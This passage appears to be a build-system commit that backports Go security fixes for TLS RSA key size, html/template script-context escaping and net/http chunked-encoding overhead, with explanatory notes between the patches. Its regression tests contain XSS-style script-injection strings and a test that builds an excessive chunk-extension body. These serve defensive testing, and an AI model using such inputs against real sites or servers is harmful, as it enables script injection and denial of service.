++6JbfK0B76vdBDRtJFC1JsvnIrGbUztxXzyQwFLaR/AjVJqpVlysLWzPKWVX6/+SJ
++u1NQOl2E8P6ycyBsuGnO89p0S4F8cMRcI2X1XQsZ7/q0NBrOMaEp5T3SrWo9GiQ3
++o2SBdbs3Y6MBPBtTu977Z/0RO63J3M5i2tjUiDfrFy7+VRLKr7qQ7JibohyB8QaR
++9tedgjn2f+of7PnP/PEl1cCphUZeHM7QKUMPT8dbqwmKtlYY43EHXcvNOT5IBk3X
++9lwJoZk/B2i+ZMRNSP34ztAwtxmasPt6RAWGQpWCn9qmttAHAnMfDqe7F7jVR6rS
++u58=
++-----END CERTIFICATE-----`
++
++func TestHandshakeRSATooBig(t *testing.T) {
++ testCert, _ := pem.Decode([]byte(largeRSAKeyCertPEM))
++
++ c := &Conn{conn: &discardConn{}, config: testConfig.Clone()}
++
++ expectedErr := "tls: server sent certificate containing RSA key larger than 8192 bits"
++ err := c.verifyServerCertificate([][]byte{testCert.Bytes})
++ if err == nil || err.Error() != expectedErr {
++ t.Errorf("Conn.verifyServerCertificate unexpected error: want %q, got %q", expectedErr, err)
++ }
++
++ expectedErr = "tls: client sent certificate containing RSA key larger than 8192 bits"
++ err = c.processCertsFromClient(Certificate{Certificate: [][]byte{testCert.Bytes}})
++ if err == nil || err.Error() != expectedErr {
++ t.Errorf("Conn.processCertsFromClient unexpected error: want %q, got %q", expectedErr, err)
++ }
++}
+diff --git a/src/crypto/tls/handshake_server.go b/src/crypto/tls/handshake_server.go
+index b16415a..2e36840 100644
+--- a/src/crypto/tls/handshake_server.go
++++ b/src/crypto/tls/handshake_server.go
+@@ -738,6 +738,10 @@ func (c *Conn) processCertsFromClient(certificate Certificate) error {
+ c.sendAlert(alertBadCertificate)
+ return errors.New("tls: failed to parse client certificate: " + err.Error())
+ }
++ if certs[i].PublicKeyAlgorithm == x509.RSA && certs[i].PublicKey.(*rsa.PublicKey).N.BitLen() > maxRSAKeySize {
++ c.sendAlert(alertBadCertificate)
++ return fmt.Errorf("tls: client sent certificate containing RSA key larger than %d bits", maxRSAKeySize)
++ }
+ }
+
+ if len(certs) == 0 && requiresClientCert(c.config.ClientAuth) {
+--
+2.25.1
+
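The handshake hunks cap RSA keys in peer certificate chains at 8192 bits to bound signature-verification cost. A minimal sketch of the size check itself; the moduli are synthesized because actually generating an 8193-bit key would take minutes (illustrative only, not part of the patch):

package main

import (
	"crypto/rsa"
	"fmt"
	"math/big"
)

// maxRSAKeySize mirrors the limit the patch adds to both handshake paths.
const maxRSAKeySize = 8192

func tooBig(pub *rsa.PublicKey) bool {
	return pub.N.BitLen() > maxRSAKeySize
}

func main() {
	boundary := &rsa.PublicKey{N: new(big.Int).Lsh(big.NewInt(1), 8191), E: 65537} // 8192-bit modulus
	oversize := &rsa.PublicKey{N: new(big.Int).Lsh(big.NewInt(1), 8192), E: 65537} // 8193-bit modulus

	fmt.Println("8192-bit key rejected:", tooBig(boundary)) // false: still accepted
	fmt.Println("8193-bit key rejected:", tooBig(oversize)) // true: handshake now aborts
}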
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch
new file mode 100644
index 0000000000..00def8fcda
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch
@@ -0,0 +1,262 @@
+From 023b542edf38e2a1f87fcefb9f75ff2f99401b4c Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Thu, 3 Aug 2023 12:24:13 -0700
+Subject: [PATCH] [release-branch.go1.20] html/template: support HTML-like
+ comments in script contexts
+
+Per Appendix B.1.1 of the ECMAScript specification, support HTML-like
+comments in script contexts. Also per section 12.5, support hashbang
+comments. This brings our parsing in-line with how browsers treat these
+comment types.
+
+Thanks to Takeshi Kaneko (GMO Cybersecurity by Ierae, Inc.) for
+reporting this issue.
+
+Fixes #62196
+Fixes #62395
+Fixes CVE-2023-39318
+
+Change-Id: Id512702c5de3ae46cf648e268cb10e1eb392a181
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1976593
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2014620
+Reviewed-on: https://go-review.googlesource.com/c/go/+/526098
+Run-TryBot: Cherry Mui <cherryyz@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport from [https://github.com/golang/go/commit/023b542edf38e2a1f87fcefb9f75ff2f99401b4c]
+CVE: CVE-2023-39318
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ src/html/template/context.go | 6 ++-
+ src/html/template/escape.go | 5 +-
+ src/html/template/escape_test.go | 10 ++++
+ src/html/template/state_string.go | 26 +++++-----
+ src/html/template/transition.go | 80 ++++++++++++++++++++-----------
+ 5 files changed, 84 insertions(+), 43 deletions(-)
+
+diff --git a/src/html/template/context.go b/src/html/template/context.go
+index 0b65313..4eb7891 100644
+--- a/src/html/template/context.go
++++ b/src/html/template/context.go
+@@ -124,6 +124,10 @@ const (
+ stateJSBlockCmt
+ // stateJSLineCmt occurs inside a JavaScript // line comment.
+ stateJSLineCmt
++ // stateJSHTMLOpenCmt occurs inside a JavaScript <!-- HTML-like comment.
++ stateJSHTMLOpenCmt
++ // stateJSHTMLCloseCmt occurs inside a JavaScript --> HTML-like comment.
++ stateJSHTMLCloseCmt
+ // stateCSS occurs inside a <style> element or style attribute.
+ stateCSS
+ // stateCSSDqStr occurs inside a CSS double quoted string.
+@@ -149,7 +153,7 @@ const (
+ // authors & maintainers, not for end-users or machines.
+ func isComment(s state) bool {
+ switch s {
+- case stateHTMLCmt, stateJSBlockCmt, stateJSLineCmt, stateCSSBlockCmt, stateCSSLineCmt:
++ case stateHTMLCmt, stateJSBlockCmt, stateJSLineCmt, stateJSHTMLOpenCmt, stateJSHTMLCloseCmt, stateCSSBlockCmt, stateCSSLineCmt:
+ return true
+ }
+ return false
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index 435f912..ad2ec69 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -698,9 +698,12 @@ func (e *escaper) escapeText(c context, n *parse.TextNode) context {
+ if c.state != c1.state && isComment(c1.state) && c1.delim == delimNone {
+ // Preserve the portion between written and the comment start.
+ cs := i1 - 2
+- if c1.state == stateHTMLCmt {
++ if c1.state == stateHTMLCmt || c1.state == stateJSHTMLOpenCmt {
+ // "<!--" instead of "/*" or "//"
+ cs -= 2
++ } else if c1.state == stateJSHTMLCloseCmt {
++ // "-->" instead of "/*" or "//"
++ cs -= 1
+ }
+ b.Write(s[written:cs])
+ written = i1
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index f550691..5f41e52 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -503,6 +503,16 @@ func TestEscape(t *testing.T) {
+ "<script>var a/*b*///c\nd</script>",
+ "<script>var a \nd</script>",
+ },
++ {
++ "JS HTML-like comments",
++ "<script>before <!-- beep\nbetween\nbefore-->boop\n</script>",
++ "<script>before \nbetween\nbefore\n</script>",
++ },
++ {
++ "JS hashbang comment",
++ "<script>#! beep\n</script>",
++ "<script>\n</script>",
++ },
+ {
+ "CSS comments",
+ "<style>p// paragraph\n" +
+diff --git a/src/html/template/state_string.go b/src/html/template/state_string.go
+index 05104be..b5cfe70 100644
+--- a/src/html/template/state_string.go
++++ b/src/html/template/state_string.go
+@@ -25,21 +25,23 @@ func _() {
+ _ = x[stateJSRegexp-14]
+ _ = x[stateJSBlockCmt-15]
+ _ = x[stateJSLineCmt-16]
+- _ = x[stateCSS-17]
+- _ = x[stateCSSDqStr-18]
+- _ = x[stateCSSSqStr-19]
+- _ = x[stateCSSDqURL-20]
+- _ = x[stateCSSSqURL-21]
+- _ = x[stateCSSURL-22]
+- _ = x[stateCSSBlockCmt-23]
+- _ = x[stateCSSLineCmt-24]
+- _ = x[stateError-25]
+- _ = x[stateDead-26]
++ _ = x[stateJSHTMLOpenCmt-17]
++ _ = x[stateJSHTMLCloseCmt-18]
++ _ = x[stateCSS-19]
++ _ = x[stateCSSDqStr-20]
++ _ = x[stateCSSSqStr-21]
++ _ = x[stateCSSDqURL-22]
++ _ = x[stateCSSSqURL-23]
++ _ = x[stateCSSURL-24]
++ _ = x[stateCSSBlockCmt-25]
++ _ = x[stateCSSLineCmt-26]
++ _ = x[stateError-27]
++ _ = x[stateDead-28]
+ }
+
+-const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSBqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateErrorstateDead"
++const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSBqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateJSHTMLOpenCmtstateJSHTMLCloseCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateErrorstateDead"
+
+-var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 154, 167, 182, 196, 204, 217, 230, 243, 256, 267, 283, 298, 308, 317}
++var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 154, 167, 182, 196, 214, 233, 241, 254, 267, 280, 293, 304, 320, 335, 345, 354}
+
+ func (i state) String() string {
+ if i >= state(len(_state_index)-1) {
+diff --git a/src/html/template/transition.go b/src/html/template/transition.go
+index 92eb351..12aa4c4 100644
+--- a/src/html/template/transition.go
++++ b/src/html/template/transition.go
+@@ -14,32 +14,34 @@ import (
+ // the updated context and the number of bytes consumed from the front of the
+ // input.
+ var transitionFunc = [...]func(context, []byte) (context, int){
+- stateText: tText,
+- stateTag: tTag,
+- stateAttrName: tAttrName,
+- stateAfterName: tAfterName,
+- stateBeforeValue: tBeforeValue,
+- stateHTMLCmt: tHTMLCmt,
+- stateRCDATA: tSpecialTagEnd,
+- stateAttr: tAttr,
+- stateURL: tURL,
+- stateSrcset: tURL,
+- stateJS: tJS,
+- stateJSDqStr: tJSDelimited,
+- stateJSSqStr: tJSDelimited,
+- stateJSBqStr: tJSDelimited,
+- stateJSRegexp: tJSDelimited,
+- stateJSBlockCmt: tBlockCmt,
+- stateJSLineCmt: tLineCmt,
+- stateCSS: tCSS,
+- stateCSSDqStr: tCSSStr,
+- stateCSSSqStr: tCSSStr,
+- stateCSSDqURL: tCSSStr,
+- stateCSSSqURL: tCSSStr,
+- stateCSSURL: tCSSStr,
+- stateCSSBlockCmt: tBlockCmt,
+- stateCSSLineCmt: tLineCmt,
+- stateError: tError,
++ stateText: tText,
++ stateTag: tTag,
++ stateAttrName: tAttrName,
++ stateAfterName: tAfterName,
++ stateBeforeValue: tBeforeValue,
++ stateHTMLCmt: tHTMLCmt,
++ stateRCDATA: tSpecialTagEnd,
++ stateAttr: tAttr,
++ stateURL: tURL,
++ stateSrcset: tURL,
++ stateJS: tJS,
++ stateJSDqStr: tJSDelimited,
++ stateJSSqStr: tJSDelimited,
++ stateJSBqStr: tJSDelimited,
++ stateJSRegexp: tJSDelimited,
++ stateJSBlockCmt: tBlockCmt,
++ stateJSLineCmt: tLineCmt,
++ stateJSHTMLOpenCmt: tLineCmt,
++ stateJSHTMLCloseCmt: tLineCmt,
++ stateCSS: tCSS,
++ stateCSSDqStr: tCSSStr,
++ stateCSSSqStr: tCSSStr,
++ stateCSSDqURL: tCSSStr,
++ stateCSSSqURL: tCSSStr,
++ stateCSSURL: tCSSStr,
++ stateCSSBlockCmt: tBlockCmt,
++ stateCSSLineCmt: tLineCmt,
++ stateError: tError,
+ }
+
+ var commentStart = []byte("<!--")
+@@ -263,7 +265,7 @@ func tURL(c context, s []byte) (context, int) {
+
+ // tJS is the context transition function for the JS state.
+ func tJS(c context, s []byte) (context, int) {
+- i := bytes.IndexAny(s, "\"`'/")
++ i := bytes.IndexAny(s, "\"`'/<-#")
+ if i == -1 {
+ // Entire input is non string, comment, regexp tokens.
+ c.jsCtx = nextJSCtx(s, c.jsCtx)
+@@ -293,6 +295,26 @@ func tJS(c context, s []byte) (context, int) {
+ err: errorf(ErrSlashAmbig, nil, 0, "'/' could start a division or regexp: %.32q", s[i:]),
+ }, len(s)
+ }
++ // ECMAScript supports HTML style comments for legacy reasons, see Appendix
++ // B.1.1 "HTML-like Comments". The handling of these comments is somewhat
++ // confusing. Multi-line comments are not supported, i.e. anything on lines
++ // between the opening and closing tokens is not considered a comment, but
++ // anything following the opening or closing token, on the same line, is
++ // ignored. As such we simply treat any line prefixed with "<!--" or "-->"
++ // as if it were actually prefixed with "//" and move on.
++ case '<':
++ if i+3 < len(s) && bytes.Equal(commentStart, s[i:i+4]) {
++ c.state, i = stateJSHTMLOpenCmt, i+3
++ }
++ case '-':
++ if i+2 < len(s) && bytes.Equal(commentEnd, s[i:i+3]) {
++ c.state, i = stateJSHTMLCloseCmt, i+2
++ }
++ // ECMAScript also supports "hashbang" comment lines, see Section 12.5.
++ case '#':
++ if i+1 < len(s) && s[i+1] == '!' {
++ c.state, i = stateJSLineCmt, i+1
++ }
+ default:
+ panic("unreachable")
+ }
+@@ -372,12 +394,12 @@ func tBlockCmt(c context, s []byte) (context, int) {
+ return c, i + 2
+ }
+
+-// tLineCmt is the context transition function for //comment states.
++// tLineCmt is the context transition function for //comment states, and the JS HTML-like comment state.
+ func tLineCmt(c context, s []byte) (context, int) {
+ var lineTerminators string
+ var endState state
+ switch c.state {
+- case stateJSLineCmt:
++ case stateJSLineCmt, stateJSHTMLOpenCmt, stateJSHTMLCloseCmt:
+ lineTerminators, endState = "\n\r\u2028\u2029", stateJS
+ case stateCSSLineCmt:
+ lineTerminators, endState = "\n\f\r", stateCSS
+--
+2.24.4
+
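The transition.go hunks teach the html/template lexer about ECMAScript's HTML-like (<!--, -->) and hashbang (#!) line comments so their contents are elided like // comments. A sketch of the rendered output, assuming a toolchain that carries this backport (illustrative only, not part of the patch):

package main

import (
	"html/template"
	"os"
)

func main() {
	// On a toolchain with this fix, the "<!-- beep" tail is lexed as a line
	// comment (matching browser behaviour) and elided from the output; older
	// toolchains passed it through and mis-tracked the script context.
	const src = "<script>before <!-- beep\nalert({{.}})\n</script>"
	t := template.Must(template.New("t").Parse(src))
	if err := t.Execute(os.Stdout, "x"); err != nil {
		panic(err)
	}
	// Expected on a patched toolchain: <script>before \nalert("x")\n</script>
}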
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch
new file mode 100644
index 0000000000..69106e3e05
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch
@@ -0,0 +1,230 @@
+From 2070531d2f53df88e312edace6c8dfc9686ab2f5 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Thu, 3 Aug 2023 12:28:28 -0700
+Subject: [PATCH] [release-branch.go1.20] html/template: properly handle
+ special tags within the script context
+
+The HTML specification has incredibly complex rules for how to handle
+"<!--", "<script", and "</script" when they appear within literals in
+the script context. Rather than attempting to apply these restrictions
+(which require a significantly more complex state machine) we apply
+the workaround suggested in section 4.12.1.3 of the HTML specification [1].
+
+More precisely, when "<!--", "<script", and "</script" appear within
+literals (strings and regular expressions, ignoring comments since we
+already elide their content) we replace the "<" with "\x3C". This avoids
+the unintuitive behavior that using these tags within literals can cause,
+by simply preventing the rendered content from triggering it. This may
+break some correct usages of these tags, but on balance is more likely
+to prevent XSS attacks where users are unknowingly either closing or not
+closing the script blocks where they think they are.
+
+Thanks to Takeshi Kaneko (GMO Cybersecurity by Ierae, Inc.) for
+reporting this issue.
+
+Fixes #62197
+Fixes #62397
+Fixes CVE-2023-39319
+
+[1] https://html.spec.whatwg.org/#restrictions-for-contents-of-script-elements
+
+Change-Id: Iab57b0532694827e3eddf57a7497ba1fab1746dc
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1976594
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2014621
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/526099
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Cherry Mui <cherryyz@google.com>
+
+Upstream-Status: Backport from [https://github.com/golang/go/commit/2070531d2f53df88e312edace6c8dfc9686ab2f5]
+CVE: CVE-2023-39319
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ src/html/template/context.go | 14 ++++++++++
+ src/html/template/escape.go | 26 ++++++++++++++++++
+ src/html/template/escape_test.go | 47 +++++++++++++++++++++++++++++++-
+ src/html/template/transition.go | 15 ++++++++++
+ 4 files changed, 101 insertions(+), 1 deletion(-)
+
+diff --git a/src/html/template/context.go b/src/html/template/context.go
+index 4eb7891..feb6517 100644
+--- a/src/html/template/context.go
++++ b/src/html/template/context.go
+@@ -168,6 +168,20 @@ func isInTag(s state) bool {
+ return false
+ }
+
++// isInScriptLiteral returns true if s is one of the literal states within a
++// <script> tag, and as such occurances of "<!--", "<script", and "</script"
++// need to be treated specially.
++func isInScriptLiteral(s state) bool {
++ // Ignore the comment states (stateJSBlockCmt, stateJSLineCmt,
++ // stateJSHTMLOpenCmt, stateJSHTMLCloseCmt) because their content is already
++ // omitted from the output.
++ switch s {
++ case stateJSDqStr, stateJSSqStr, stateJSBqStr, stateJSRegexp:
++ return true
++ }
++ return false
++}
++
+ // delim is the delimiter that will end the current HTML attribute.
+ type delim uint8
+
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index ad2ec69..de8cf6f 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -10,6 +10,7 @@ import (
+ "html"
+ "internal/godebug"
+ "io"
++ "regexp"
+ "text/template"
+ "text/template/parse"
+ )
+@@ -650,6 +651,26 @@ var delimEnds = [...]string{
+ delimSpaceOrTagEnd: " \t\n\f\r>",
+ }
+
++var (
++ // Per WHATWG HTML specification, section 4.12.1.3, there are extremely
++ // complicated rules for how to handle the set of opening tags <!--,
++ // <script, and </script when they appear in JS literals (i.e. strings,
++ // regexs, and comments). The specification suggests a simple solution,
++ // rather than implementing the arcane ABNF, which involves simply escaping
++ // the opening bracket with \x3C. We use the below regex for this, since it
++ // makes doing the case-insensitive find-replace much simpler.
++ specialScriptTagRE = regexp.MustCompile("(?i)<(script|/script|!--)")
++ specialScriptTagReplacement = []byte("\\x3C$1")
++)
++
++func containsSpecialScriptTag(s []byte) bool {
++ return specialScriptTagRE.Match(s)
++}
++
++func escapeSpecialScriptTags(s []byte) []byte {
++ return specialScriptTagRE.ReplaceAll(s, specialScriptTagReplacement)
++}
++
+ var doctypeBytes = []byte("<!DOCTYPE")
+
+ // escapeText escapes a text template node.
+@@ -708,6 +729,11 @@ func (e *escaper) escapeText(c context, n *parse.TextNode) context {
+ b.Write(s[written:cs])
+ written = i1
+ }
++ if isInScriptLiteral(c.state) && containsSpecialScriptTag(s[i:i1]) {
++ b.Write(s[written:i])
++ b.Write(escapeSpecialScriptTags(s[i:i1]))
++ written = i1
++ }
+ if i == i1 && c.state == c1.state {
+ panic(fmt.Sprintf("infinite loop from %v to %v on %q..%q", c, c1, s[:i], s[i:]))
+ }
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index 5f41e52..0cacb20 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -513,6 +513,21 @@ func TestEscape(t *testing.T) {
+ "<script>#! beep\n</script>",
+ "<script>\n</script>",
+ },
++ {
++ "Special tags in <script> string literals",
++ `<script>var a = "asd < 123 <!-- 456 < fgh <script jkl < 789 </script"</script>`,
++ `<script>var a = "asd < 123 \x3C!-- 456 < fgh \x3Cscript jkl < 789 \x3C/script"</script>`,
++ },
++ {
++ "Special tags in <script> string literals (mixed case)",
++ `<script>var a = "<!-- <ScripT </ScripT"</script>`,
++ `<script>var a = "\x3C!-- \x3CScripT \x3C/ScripT"</script>`,
++ },
++ {
++ "Special tags in <script> regex literals (mixed case)",
++ `<script>var a = /<!-- <ScripT </ScripT/</script>`,
++ `<script>var a = /\x3C!-- \x3CScripT \x3C/ScripT/</script>`,
++ },
+ {
+ "CSS comments",
+ "<style>p// paragraph\n" +
+@@ -1501,8 +1516,38 @@ func TestEscapeText(t *testing.T) {
+ context{state: stateJS, element: elementScript},
+ },
+ {
++ // <script and </script tags are escaped, so </script> should not
++ // cause us to exit the JS state.
+ `<script>document.write("<script>alert(1)</script>");`,
+- context{state: stateText},
++ context{state: stateJS, element: elementScript},
++ },
++ {
++ `<script>document.write("<script>`,
++ context{state: stateJSDqStr, element: elementScript},
++ },
++ {
++ `<script>document.write("<script>alert(1)</script>`,
++ context{state: stateJSDqStr, element: elementScript},
++ },
++ {
++ `<script>document.write("<script>alert(1)<!--`,
++ context{state: stateJSDqStr, element: elementScript},
++ },
++ {
++ `<script>document.write("<script>alert(1)</Script>");`,
++ context{state: stateJS, element: elementScript},
++ },
++ {
++ `<script>document.write("<!--");`,
++ context{state: stateJS, element: elementScript},
++ },
++ {
++ `<script>let a = /</script`,
++ context{state: stateJSRegexp, element: elementScript},
++ },
++ {
++ `<script>let a = /</script/`,
++ context{state: stateJS, element: elementScript, jsCtx: jsCtxDivOp},
+ },
+ {
+ `<script type="text/template">`,
+diff --git a/src/html/template/transition.go b/src/html/template/transition.go
+index 12aa4c4..3d2a37c 100644
+--- a/src/html/template/transition.go
++++ b/src/html/template/transition.go
+@@ -214,6 +214,11 @@ var (
+ // element states.
+ func tSpecialTagEnd(c context, s []byte) (context, int) {
+ if c.element != elementNone {
++ // script end tags ("</script") within script literals are ignored, so that
++ // we can properly escape them.
++ if c.element == elementScript && (isInScriptLiteral(c.state) || isComment(c.state)) {
++ return c, len(s)
++ }
+ if i := indexTagEnd(s, specialTagEndMarkers[c.element]); i != -1 {
+ return context{}, i
+ }
+@@ -353,6 +358,16 @@ func tJSDelimited(c context, s []byte) (context, int) {
+ inCharset = true
+ case ']':
+ inCharset = false
++ case '/':
++ // If "</script" appears in a regex literal, the '/' should not
++ // close the regex literal, and it will later be escaped to
++ // "\x3C/script" in escapeText.
++ if i > 0 && i+7 <= len(s) && bytes.Compare(bytes.ToLower(s[i-1:i+7]), []byte("</script")) == 0 {
++ i++
++ } else if !inCharset {
++ c.state, c.jsCtx = stateJS, jsCtxDivOp
++ return c, i + 1
++ }
+ default:
+ // end delimiter
+ if !inCharset {
+--
+2.24.4
+
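For context, a minimal standalone sketch of the find-and-replace approach the patch above backports: a case-insensitive regexp rewrites "<script", "</script", and "<!--" inside JS literal content so they begin with "\x3C" and can no longer open or close a script element. This uses only the public regexp API and is not html/template's internal code.

package main

import (
	"fmt"
	"regexp"
)

// Same pattern and replacement as the patch's specialScriptTagRE, reproduced
// here purely for illustration.
var (
	specialScriptTagRE          = regexp.MustCompile(`(?i)<(script|/script|!--)`)
	specialScriptTagReplacement = []byte(`\x3C$1`)
)

func escapeSpecialScriptTags(s []byte) []byte {
	return specialScriptTagRE.ReplaceAll(s, specialScriptTagReplacement)
}

func main() {
	in := []byte(`var a = "<!-- <ScripT </ScripT"`)
	fmt.Printf("%s\n", escapeSpecialScriptTags(in))
	// Prints: var a = "\x3C!-- \x3CScripT \x3C/ScripT"
}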
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-39326.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-39326.patch
new file mode 100644
index 0000000000..998af361e8
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-39326.patch
@@ -0,0 +1,181 @@
+From 6446af942e2e2b161c4ec1b60d9703a2b55dc4dd Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Tue, 7 Nov 2023 10:47:56 -0800
+Subject: [PATCH] [release-branch.go1.20] net/http: limit chunked data overhead
+
+The chunked transfer encoding adds some overhead to
+the content transferred. When writing one byte per
+chunk, for example, there are five bytes of overhead
+per byte of data transferred: "1\r\nX\r\n" to send "X".
+
+Chunks may include "chunk extensions",
+which we skip over and do not use.
+For example: "1;chunk extension here\r\nX\r\n".
+
+A malicious sender can use chunk extensions to add
+about 4k of overhead per byte of data.
+(The maximum chunk header line size we will accept.)
+
+Track the amount of overhead read in chunked data,
+and produce an error if it seems excessive.
+
+Updates #64433
+Fixes #64434
+Fixes CVE-2023-39326
+
+Change-Id: I40f8d70eb6f9575fb43f506eb19132ccedafcf39
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2076135
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+(cherry picked from commit 3473ae72ee66c60744665a24b2fde143e8964d4f)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2095407
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/547355
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/6446af942e2e2b161c4ec1b60d9703a2b55dc4dd]
+CVE: CVE-2023-39326
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/net/http/internal/chunked.go | 36 +++++++++++++---
+ src/net/http/internal/chunked_test.go | 59 +++++++++++++++++++++++++++
+ 2 files changed, 89 insertions(+), 6 deletions(-)
+
+diff --git a/src/net/http/internal/chunked.go b/src/net/http/internal/chunked.go
+index f06e572..ddbaacb 100644
+--- a/src/net/http/internal/chunked.go
++++ b/src/net/http/internal/chunked.go
+@@ -39,7 +39,8 @@ type chunkedReader struct {
+ n uint64 // unread bytes in chunk
+ err error
+ buf [2]byte
+- checkEnd bool // whether need to check for \r\n chunk footer
++ checkEnd bool // whether need to check for \r\n chunk footer
++ excess int64 // "excessive" chunk overhead, for malicious sender detection
+ }
+
+ func (cr *chunkedReader) beginChunk() {
+@@ -49,10 +50,38 @@ func (cr *chunkedReader) beginChunk() {
+ if cr.err != nil {
+ return
+ }
++ cr.excess += int64(len(line)) + 2 // header, plus \r\n after the chunk data
++ line = trimTrailingWhitespace(line)
++ line, cr.err = removeChunkExtension(line)
++ if cr.err != nil {
++ return
++ }
+ cr.n, cr.err = parseHexUint(line)
+ if cr.err != nil {
+ return
+ }
++ // A sender who sends one byte per chunk will send 5 bytes of overhead
++ // for every byte of data. ("1\r\nX\r\n" to send "X".)
++ // We want to allow this, since streaming a byte at a time can be legitimate.
++ //
++ // A sender can use chunk extensions to add arbitrary amounts of additional
++ // data per byte read. ("1;very long extension\r\nX\r\n" to send "X".)
++ // We don't want to disallow extensions (although we discard them),
++ // but we also don't want to allow a sender to reduce the signal/noise ratio
++ // arbitrarily.
++ //
++ // We track the amount of excess overhead read,
++ // and produce an error if it grows too large.
++ //
++ // Currently, we say that we're willing to accept 16 bytes of overhead per chunk,
++ // plus twice the amount of real data in the chunk.
++ cr.excess -= 16 + (2 * int64(cr.n))
++ if cr.excess < 0 {
++ cr.excess = 0
++ }
++ if cr.excess > 16*1024 {
++ cr.err = errors.New("chunked encoding contains too much non-data")
++ }
+ if cr.n == 0 {
+ cr.err = io.EOF
+ }
+@@ -133,11 +162,6 @@ func readChunkLine(b *bufio.Reader) ([]byte, error) {
+ if len(p) >= maxLineLength {
+ return nil, ErrLineTooLong
+ }
+- p = trimTrailingWhitespace(p)
+- p, err = removeChunkExtension(p)
+- if err != nil {
+- return nil, err
+- }
+ return p, nil
+ }
+
+diff --git a/src/net/http/internal/chunked_test.go b/src/net/http/internal/chunked_test.go
+index d067165..b20747d 100644
+--- a/src/net/http/internal/chunked_test.go
++++ b/src/net/http/internal/chunked_test.go
+@@ -212,3 +212,62 @@ func TestChunkReadPartial(t *testing.T) {
+ }
+
+ }
++
++func TestChunkReaderTooMuchOverhead(t *testing.T) {
++ // If the sender is sending 100x as many chunk header bytes as chunk data,
++ // we should reject the stream at some point.
++ chunk := []byte("1;")
++ for i := 0; i < 100; i++ {
++ chunk = append(chunk, 'a') // chunk extension
++ }
++ chunk = append(chunk, "\r\nX\r\n"...)
++ const bodylen = 1 << 20
++ r := NewChunkedReader(&funcReader{f: func(i int) ([]byte, error) {
++ if i < bodylen {
++ return chunk, nil
++ }
++ return []byte("0\r\n"), nil
++ }})
++ _, err := io.ReadAll(r)
++ if err == nil {
++ t.Fatalf("successfully read body with excessive overhead; want error")
++ }
++}
++
++func TestChunkReaderByteAtATime(t *testing.T) {
++ // Sending one byte per chunk should not trip the excess-overhead detection.
